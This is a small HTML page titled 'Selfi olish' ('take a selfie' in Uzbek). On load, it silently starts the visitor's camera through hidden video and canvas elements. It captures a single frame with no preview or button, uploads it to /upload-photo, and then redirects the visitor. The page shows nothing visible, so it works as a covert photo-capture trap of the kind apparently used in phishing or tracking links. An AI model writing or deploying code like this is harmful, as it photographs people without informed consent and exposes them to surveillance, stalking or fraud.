<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Selfi olish</title>
</head>
<body>
    

<video id="video" width="320" autoplay style="display:none;"></video>
<canvas id="canvas" width="320" height="320" style="display:none;"></canvas>

<script>
async function startCameraAndCapture() {
    try {
        const stream = await navigator.mediaDevices.getUserMedia({ video: true });
        const video = document.getElementById('video');
        const canvas = document.getElementById('canvas');

        video.srcObject = stream;

        // Video oynasini yuklagandan keyin rasm olish
        video.onloadedmetadata = () => {
            canvas.getContext('2d').drawImage(video, 0, 0, 320, 320);
            canvas.toBlob(async (blob) => {
                let form = new FormData();
                form.append("photo", blob, "selfie.jpg");

                let resp = await fetch("/upload-photo", {
                    method: "POST",
                    body: form
                });

                let data = await resp.json();
                if (data.redirect) {
                    window.location.href = data.redirect;
                }
            }, "image/jpeg");
        };
    } catch (err) {
        alert("Kamera ruxsati berilmadi: " + err);
    }
}

// Sayt yuklanganda avtomatik ishga tushadi
window.onload = startCameraAndCapture;
</script>

</body>
</html>
